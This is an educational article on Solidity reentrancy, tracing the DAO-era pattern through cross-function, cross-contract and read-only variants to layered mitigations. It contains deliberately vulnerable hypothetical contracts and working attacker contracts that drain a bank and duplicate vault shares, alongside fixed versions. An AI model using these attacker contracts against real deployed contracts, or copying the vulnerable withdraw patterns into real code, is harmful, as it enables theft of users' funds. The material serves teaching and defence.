Understanding Reentrancy: From the DAO Hack to Modern DeFi
HasFocus Research · 2026
Abstract
An educational overview of reentrancy vulnerabilities in Solidity smart contracts. We trace the evolution from the classic 2016 DAO exploit through modern cross-contract, read-only, and governance reentrancy variants, and discuss effective mitigation strategies for each category.
1. Classic Reentrancy
The original reentrancy pattern involves a function that makes an external call (for example, sending ETH with a low-level call that forwards all remaining gas) before updating its own state. An attacker's contract receives the ETH, re-enters the original function from its receive or fallback function, and repeats the withdrawal while its recorded balance is still unchanged; each re-entry pays out the same amount until the contract is drained or gas runs out. The fix is the checks-effects-interactions pattern: validate inputs, update state, and only then make the external call, so a re-entrant call sees the already-updated balance and fails its checks. Relying on the 2300-gas stipend of transfer or send instead is not a robust defence, since opcode gas costs have changed over time and the stipend is not a security boundary.
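The pattern described above, as an added example that is not code from the original page or from any real protocol. VulnerableBank, Attacker and SafeBank are hypothetical contracts written here to show the vulnerable withdraw, the re-entering attacker, and the checks-effects-interactions fix side by side:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration; all contract and function names are hypothetical.

// Vulnerable: the external call happens before the balance is zeroed.
contract VulnerableBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // INTERACTION before EFFECT: call{value: ...} forwards all remaining
        // gas, so the recipient's receive() can call withdraw() again while
        // balances[msg.sender] is still unchanged.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
        balances[msg.sender] = 0;
    }
}

// Attacker: re-enters withdraw() from receive() until the bank is drained.
contract Attacker {
    VulnerableBank public immutable bank;

    constructor(VulnerableBank _bank) {
        bank = _bank;
    }

    function attack() external payable {
        bank.deposit{value: msg.value}();
        bank.withdraw();
    }

    receive() external payable {
        // Each re-entry withdraws the same (still unzeroed) balance. Stop once
        // the bank cannot pay another full round, so the last call does not
        // revert and unwind the whole chain.
        if (address(bank).balance >= bank.balances(address(this))) {
            bank.withdraw();
        }
    }
}

// Fixed: checks-effects-interactions. The balance is zeroed before the ETH
// leaves, so a re-entrant withdraw() fails the `amount > 0` check, which
// reverts the attacker's entire transaction.
contract SafeBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];            // check
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;                         // effect
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction
        require(ok, "send failed");
    }
}
```

With SafeBank, the attacker's re-entrant withdraw reverts inside receive(), which makes the outer call return false and the whole attack transaction revert; an honest recipient whose receive() does nothing is unaffected.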
2. Modern Variants
As DeFi protocols became more composable, new reentrancy variants emerged that a guard on a single function does not stop. Cross-function reentrancy re-enters a different function of the same contract that shares state with the one mid-execution: the guarded withdraw is locked, but an unguarded transfer of the same balance is not. Cross-contract reentrancy does the same across contract boundaries, landing the callback in a second contract that reads or writes state (a token balance, a share price) that the first contract has only half-updated, so neither contract's own lock is ever crossed. Read-only reentrancy abuses view functions: they are rarely guarded and change no state themselves, but a third contract that calls one during the callback receives a value computed from the inconsistent intermediate state, and acts on it. Each variant requires mitigation beyond a per-function ReentrancyGuard modifier.
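The cross-function and read-only variants in one place, as an added example rather than code from the page or any real protocol. Vault, CrossFunctionAttacker and Lender are hypothetical; redeemAll() is guarded but violates checks-effects-interactions, transfer() is unguarded, and pricePerShare() is a view that a third contract trusts:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration; all contract and function names are hypothetical.

contract Vault {
    mapping(address => uint256) public shares;
    uint256 public totalShares;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    // One share per wei on deposit; redemptions pay pro rata.
    function deposit() external payable {
        shares[msg.sender] += msg.value;
        totalShares += msg.value;
    }

    // Guarded against re-entering itself, but ETH leaves before the shares
    // are burned, so the contract is inconsistent during the callback.
    function redeemAll() external nonReentrant {
        uint256 amount = shares[msg.sender];
        require(amount > 0, "no shares");
        uint256 assets = amount * address(this).balance / totalShares;
        (bool ok, ) = msg.sender.call{value: assets}("");
        require(ok, "send failed");
        totalShares -= amount;
        shares[msg.sender] = 0; // overwrite: a transfer made during the call is not deducted
    }

    // Cross-function target: unguarded, and shares `shares` with redeemAll().
    function transfer(address to, uint256 amount) external {
        require(shares[msg.sender] >= amount, "insufficient");
        shares[msg.sender] -= amount;
        shares[to] += amount;
    }

    // Read-only target: during redeemAll()'s callback the balance is already
    // reduced but totalShares is not, so this reports a price that is too low.
    function pricePerShare() external view returns (uint256) {
        if (totalShares == 0) return 1e18;
        return address(this).balance * 1e18 / totalShares;
    }
}

// Cross-function reentrancy: nonReentrant on redeemAll() does not cover transfer().
contract CrossFunctionAttacker {
    Vault public immutable vault;
    address public immutable accomplice;

    constructor(Vault _vault, address _accomplice) {
        vault = _vault;
        accomplice = _accomplice;
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.redeemAll(); // pays out, then receive() below runs
    }

    receive() external payable {
        // redeemAll() is locked, but transfer() is not. Our shares have not
        // been zeroed yet, so move them to the accomplice, who can redeem
        // them again even though the backing ETH was just paid to us.
        vault.transfer(accomplice, vault.shares(address(this)));
    }
}

// Read-only reentrancy victim: a third contract that trusts pricePerShare()
// as a collateral oracle. Called during redeemAll()'s callback (for example
// from the redeemer's receive()), it prices shares at the stale, depressed
// value and would undervalue collateral or mis-size a liquidation.
contract Lender {
    Vault public immutable vault;

    constructor(Vault _vault) {
        vault = _vault;
    }

    function collateralValue(address user) external view returns (uint256) {
        return vault.shares(user) * vault.pricePerShare() / 1e18;
    }
}
```

Walking through the numbers: with 100 wei of honest deposits, the attacker deposits 100 wei, redeemAll() pays it 100 wei, and the callback transfers its 100 unburned shares to the accomplice. After redeemAll() finishes, totalShares is 100 but 200 shares are outstanding, and the accomplice's redeemAll() takes the remaining 100 wei. During the same callback pricePerShare() returns half its true value, which is what the Lender would read.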
3. Mitigation Strategies
Effective protection requires a layered approach: (1) always follow checks-effects-interactions, so that state is consistent before any external call; (2) use a single ReentrancyGuard lock shared by every state-changing function that touches the same state, not a per-function guard, and remember that the lock does nothing for view functions or for other contracts unless it is also checked by views or exposed for consumers to query; (3) treat ERC-721/1155 receiver hooks (onERC721Received, onERC1155Received) as re-entry points, since safeTransferFrom and safe minting call into a contract recipient before the caller's function has returned; (4) audit cross-contract interactions for shared-state assumptions, including every view another protocol might read mid-transaction; and (5) consider formal verification for high-value contracts. No single technique catches all variants.
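The hardened counterpart of the vault pattern, as an added example that is not the page's or any project's code (in particular, this ReentrancyGuard is a minimal hand-written one, not the OpenZeppelin contract). SafeVault and Lender are hypothetical; the guard's lock is shared by all state-changing functions, is checked by the view, and is exposed so consumers can refuse to read while the vault is mid-call:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration; all contract and function names are hypothetical.

abstract contract ReentrancyGuard {
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;
    uint256 private _status = NOT_ENTERED;

    modifier nonReentrant() {
        require(_status == NOT_ENTERED, "reentrant call");
        _status = ENTERED;
        _;
        _status = NOT_ENTERED;
    }

    // View-side guard: read-only reentrancy reverts instead of returning
    // a value computed from intermediate state.
    modifier nonReentrantView() {
        require(_status == NOT_ENTERED, "reentrant view");
        _;
    }

    // Lets other contracts check the lock before trusting any view.
    function reentrancyLocked() public view returns (bool) {
        return _status == ENTERED;
    }
}

contract SafeVault is ReentrancyGuard {
    mapping(address => uint256) public shares;
    uint256 public totalShares;

    function deposit() external payable nonReentrant {
        shares[msg.sender] += msg.value;
        totalShares += msg.value;
    }

    // Checks-effects-interactions: every state change happens before the
    // external call, and the same lock covers transfer() and deposit().
    function redeemAll() external nonReentrant {
        uint256 amount = shares[msg.sender];              // check
        require(amount > 0, "no shares");
        uint256 assets = amount * address(this).balance / totalShares;
        shares[msg.sender] = 0;                           // effects
        totalShares -= amount;
        (bool ok, ) = msg.sender.call{value: assets}(""); // interaction
        require(ok, "send failed");
    }

    function transfer(address to, uint256 amount) external nonReentrant {
        require(shares[msg.sender] >= amount, "insufficient");
        shares[msg.sender] -= amount;
        shares[to] += amount;
    }

    // Reverts if read while any guarded function is mid-execution.
    function pricePerShare() external view nonReentrantView returns (uint256) {
        if (totalShares == 0) return 1e18;
        return address(this).balance * 1e18 / totalShares;
    }
}

// Consumer-side defence: refuse to act while the vault's lock is held, rather
// than trusting the view alone. Redundant here because pricePerShare() already
// checks the lock, but it is the only protection available when the upstream
// contract guards its state-changing functions and not its views.
contract Lender {
    SafeVault public immutable vault;

    constructor(SafeVault _vault) {
        vault = _vault;
    }

    function collateralValue(address user) external view returns (uint256) {
        require(!vault.reentrancyLocked(), "vault busy");
        return vault.shares(user) * vault.pricePerShare() / 1e18;
    }
}
```

Two things are doing the work here. Checks-effects-interactions makes the state consistent before the callback, so even an unguarded read would see correct values; the shared lock is the second layer for any function the audit missed, and exposing it closes the read-only variant for downstream protocols that would otherwise have no way to tell that the vault is mid-call.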